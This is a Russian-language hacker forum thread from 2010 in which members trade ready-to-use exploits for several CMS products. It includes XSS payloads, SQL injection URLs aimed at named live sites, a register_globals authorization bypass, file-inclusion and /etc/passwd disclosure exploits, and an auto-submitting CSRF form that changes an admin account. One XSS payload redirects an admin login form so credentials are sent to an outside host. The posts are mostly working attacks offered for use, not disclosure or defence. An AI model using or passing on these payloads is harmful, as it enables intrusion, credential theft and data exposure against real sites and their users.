Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

28.04.2010, 17:36
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
Concrete CMS
-Пассивная XSS
Код:
http://www.concrete5.org/search/-/search/?query=%3E%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&submit=Go+%BB
******************
оффсайт:
http://www.concrete5.org/
скачать:
http://www.concrete5.org/download_file/-/view/12742/
|
|
|

29.04.2010, 05:20
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Tribiq CMS 5.2.2b
Пассивная XSS:
/admin/adminlogin.php?desturl=%22%3E%3Cscript%3Ealert();% 3C/script%3E
Мутим чётко и дезрко (c):
Need: mg=off, хотя х.з., js такая весчь что можно и без кавычек обойтись.
/admin/adminlogin.php?desturl=%22%3E%3CSCRIPT%3Edocument. forms[0].action='http://xenk/index.php';%3C/script%3E
До изменения:
<form action="adminlogin.php" method="POST" name="f">
После изменения:
<form action="http://xenk/index.php" method="POST" name="f">
Админ вводит пасс/логин, и данные идут не в adminlogin.php, а в http://xenk/index.php.
|
|
|

29.04.2010, 08:05
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
v.1.0 RyShell CMS
SQL Injection
пример сайта с этой кмс
Код:
http://www.papiorec.org/index.php?url=-8+union+select+unhex%28hex%28version%28%29%29%29--
на офф сайте тоже имеется SQL Injection:
Код:
http://www.ryshell.com/index2.php?url=-25+UNiON+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex%28hex%28version%28%29%29%29,18,19,20,21--
хотя в админку можно попасть минуя авторизацию
http://www.ryshell.com/admin/admin.php
|
|
|

29.04.2010, 18:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
ecoCMS
Site: www.ecocms.com
Vulnerability: Authorization bypass
Severity: High
Needs: register_globals=On
Exploit: /admin.php?_SESSION[user_in]=1
Reason: В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль:
PHP код:
<?php
/*
ecoCMS - Quick & easy to use Content Management System (CMS)
(c)2009 by ecoCMS.com - visit for PRO version.
*/
include('config.php');
if($_GET['panel']=='logout')session_destroy();
if($_POST['user'] && $_POST['pass']){
// user is trying to login here.
// verify his user/pass.
if($_POST['user']==constant('accessUser') && $_POST['pass']==constant('accessPass'))
$_SESSION['user_in']=1;
else
$Message = 'Username or password incorrect!';
}
if(!$_SESSION['user_in'])$HideContents=1;
else unset($HideContents);
?>
В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль. Следовательно. мы можем не передавая post-данные с логином и паролем, установить значение переменной сессии при register_globals=On.
Последний раз редактировалось shell_c0de; 06.05.2010 в 18:17..
|
|
|

02.05.2010, 19:23
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
ISPmanager 4.3 Professional
Пассивная XSS:
/ispmgr?func=%3C/script%3E%22%3E%3Cscript%3Ealert();%3C/script%3E
Последний раз редактировалось Ctacok; 21.05.2010 в 18:31..
|
|
|

06.05.2010, 16:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
Campsite (3.3.5)
Site: campsite.campware.org
Vulnerability: Remote File Inclusion || Local File Inclusion
Severity: High
Needs: register_globals=On
Exploit: /tests/test_autopublish.php?GLOBALS[g_campsiteDir]=RFI ; /classes/ObjectType.php?GLOBALS[g_campsiteDir]=RFI
Reason: В tests/test_autopublish.php, /classes/ObjectType.php и в других скриптах часто используемая глобальная переменная g_campsiteDir не определена. Она определена лишь в скрипте set_path.php, который в самом вышеуказанном скрипте не подключается.
Участок кода в tests/test_autopublish.php:
PHP код:
<?php
require_once($GLOBALS['g_campsiteDir']."/classes/Article.php");
require_once($GLOBALS['g_campsiteDir']."/classes/ArticlePublish.php");
require_once($GLOBALS['g_campsiteDir']."/classes/Issue.php");
require_once($GLOBALS['g_campsiteDir']."/classes/IssuePublish.php");
...
Участок кода в /classes/ObjectType.php:
PHP код:
<?php
/**
* @package Campsite
*/
/**
* Includes
*/
require_once($GLOBALS['g_campsiteDir'].'/classes/DatabaseObject.php');
require_once($GLOBALS['g_campsiteDir'].'/classes/Translation.php');
Следовательно. мы можем установить значение глобальной переменной и заинклудить произвольный файл при register_globals=On.
При allow_url_include=On/Off имеем RFI/LFI соответственно. Для проведения LFI скорее всего понадобится ещё и magic_quotes_gpc=On для того, чтобы обрезать лишнее нулл-байтом.
При register_globals=Off имеем лишь раскрытие путей.
|
|
|

06.05.2010, 16:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
//Вдогонку к #391
ecoCMS
Site: www.ecocms.com
Vulnerability: XSS
Severity: Low
Needs: -
Exploit: /admin.php?p=%3Cscript%3Ealert()%3C/script%3E
Reason: get-параметр p в admin.php недостаточно фильтруется. Код приводить смысла не вижу)
|
|
|

06.05.2010, 18:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
DynPage
Site: www.dynpage.net
Vulnerability: Arbitrary files content disclosing
Severity: High
Needs: -
Exploit: /content/dynpage_load.php?file=/etc/passwd
Reason: Файл /content/dynpage_load.php не защищён от прямого просмотра. То есть в других местах, где собственно идёт вывод контента с помощью этого скрипта есть какая-то фильтрация, а здесь без никаких ограничений имеем читалку.
Уязвимый код /content/dynpage_load.php:
PHP код:
...
$filename = $_GET["file"];
if (!is_dir ($filename) && file_exists ($filename)) {
$bytes = filesize ($filename);
$fh = fopen($filename, 'r');
print (fread ($fh, $bytes));
fclose ($fh);
}
else
print ("DynPage file not found: ".htmlspecialchars ($filename)."");
?>
Example: на официальном сайте: http://www.dynpage.net/dynpage/content/dynpage_load.php?file=/etc/passwd
Последний раз редактировалось shell_c0de; 06.05.2010 в 18:54..
|
|
|

07.05.2010, 11:16
|
|
Участник форума
Регистрация: 05.06.2009
Сообщений: 225
Провел на форуме: 2793173
Репутация:
297
|
|
Rezervi 3.0.2
Произвольный PHP сценарий
Код:
/include/mail.inc.php?root=[file]
download: http://www.rezervi.com/downloads/rezervi3_0_2.zip
|
|
|

09.05.2010, 14:20
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Social Engine v 3.18
Активная XSS:
/profile.php?user=victim
Переходим на вкладку Comments.
<a href='jav ascript:alert();'>xek</a>
/profile.php?user=victim
Переходим на вкладку Comments.
<IMG src="jav ascript:alert()"></img>
Активная XSS:
/user_editprofile_style.php
Код HTML:
body{
background-image: url('javascript:alert()');
}
CSRF:
Код HTML:
<div style='display:none'>
<form action='http://localhost/se/admin/admin_viewusers_edit.php' method='post' name='xeker'>
<input type='text' class='text' name='user_email' value='milo@mail.com' size='30' maxlength='70'>
<input type='text' class='text' name='user_username' value='Ctacok' size='30' maxlength='50'>
<input type='password' class='text' name='user_password' value='' size='30' maxlength='50'>
<select class='text' name='user_enabled'><option value='0'>Disabled</option>
<select class='text' name='user_level_id'><option value='1' SELECTED>Default Level</option>
<select class='text' name='user_profilecat_id'><option value='1' SELECTED>Standard Users</option>
<input type='text' class='text' name='user_invitesleft' value='5' maxlength='3' size='2'>
<input type='submit' class='button' value='Save Changes'>
<input type='hidden' name='task' value='edituser'>
<input type='hidden' name='user_id' value='1'>
<input type='hidden' name='s' value='id'>
<input type='hidden' name='p' value='1'>
<input type='hidden' name='f_user' value=''>
<input type='hidden' name='f_email' value=''><input type='hidden' name='f_level' value=''>
<input type='hidden' name='f_subnet' value=''>
<input type='hidden' name='f_enabled' value=''>
</form>
</div>
<script language="JavaScript" type="text/javascript">
document.xeker.submit();
</script>
Последний раз редактировалось Ctacok; 14.06.2010 в 19:29..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|